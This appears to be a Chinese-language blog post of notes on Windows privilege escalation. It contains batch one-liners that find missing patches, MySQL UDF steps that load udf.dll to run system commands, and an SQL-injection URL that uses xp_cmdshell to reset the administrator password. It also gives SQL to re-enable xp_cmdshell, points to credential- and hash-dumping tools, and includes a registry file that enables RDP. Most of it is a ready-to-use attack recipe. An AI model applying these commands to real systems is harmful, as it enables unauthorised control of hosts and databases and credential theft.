windows提权

发表于 | 分类于 |

水平权限提升

获得其他用户的权限

垂直权限提升

由普通的或者权限不完整的账号提升为拥有完整权限的管理员账号或者root权限

操作系统漏洞提权

systeminfo

查看系统信息补丁编号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Users\Ni7eipr>systeminfo

主机名:
OS 名称:          Microsoft Windows 10 专业版
OS 版本:          10.0.10586 暂缺 Build 10586
......
修补程序:         安装了 6 个修补程序。
                  [01]: KB3139907
                  [02]: KB3140768
                  [03]: KB3142588
                  [04]: KB3173428
                  [05]: KB3174060
                  [06]: KB3172985
.......

检查补丁情况命令

1
2
3
4
5
6
7
8
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt
1
2
3
4
5
6
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt

执行结果

image

根据结果网上寻找漏洞进行利用

效果

image

第三方服务提权

ftp

mysql

udf提权

UDF 就是 User defined Function

mysql如何编写udf
UDF Compiling and Installing

上传一个udf.dll

  • 若mysql小于5.1版本
    C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll

  • 大于mysql5.1版本
    %mysql%\plugin\udf.dll

  • 用 select @@plugin_dir 查询plugin路径
    默认 C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\udf.dll

使用sql语句创建功能函数

1
CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'

使用sql语句

1
select shell(‘cmd','whoami')

删除创建的函数

1
drop function shell;

直接使用udf.php

image

mof提权

mssql

通过xp_cmdshell组件执行系统命令

1
2
index.aspx?id=1;EXEC
xp_cmdshell ‘net user administrator 123456';--

如果xp_cmdshell被关闭

执行开启xp_cmdshell

1
2
3
4
5
6
7
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE

导出主机密码

  • mimkatz
  • getpass

导出主机密码hash

  • wce
  • gethash
  • hashdump

hash解密网站
http://www.objectif-securite.ch/ophcrack.php

开启3389

1
2
3
4
5
6
7
8
9
10
11
12
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D

regedit /s c:\3389.reg
打赏
0%